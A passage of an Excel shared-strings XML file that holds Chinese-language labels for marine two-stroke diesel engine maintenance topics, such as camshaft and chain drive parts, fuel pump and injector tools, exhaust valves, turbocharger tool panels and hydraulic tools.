    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀特殊运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵设定</t>
    </r>
  </si>
  <si>
    <r>
      <t>VIT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵顶盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵偶件安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮滚轮导套提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单向阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器元件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器单向阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧垫块底脚</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端支撑螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准拧紧力矩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机横截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖工具板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆液压工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆额外工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆支撑工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体，详图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体排气侧螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套珩磨工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器测试设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头，液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头，工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴，工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块停止液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块停止</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴瓦工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减振器，液压工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条传动及凸轮布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间链轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴和链轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器链条张紧装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器本体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动导轨，上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动导轨，下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压缸单元详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液力能源系统驱动详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液力能源系统蓄压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液力能源系统低压系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液力能源系统高压系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统电子部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴链传动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动部件工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴量规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴定位量规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮张紧液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配器驱动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀详图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，液压工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀，额外工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵，流量图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号气缸燃油泵提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器、燃油泵工具板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器，工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵密封安装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵，工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气阀，工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器检查工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵，提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器，额外工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器喷嘴清洗工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管和扫气箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱底板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>K90MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，增压器工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全帽布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁垫块地脚</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大件工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控系统参数设置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机组主数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
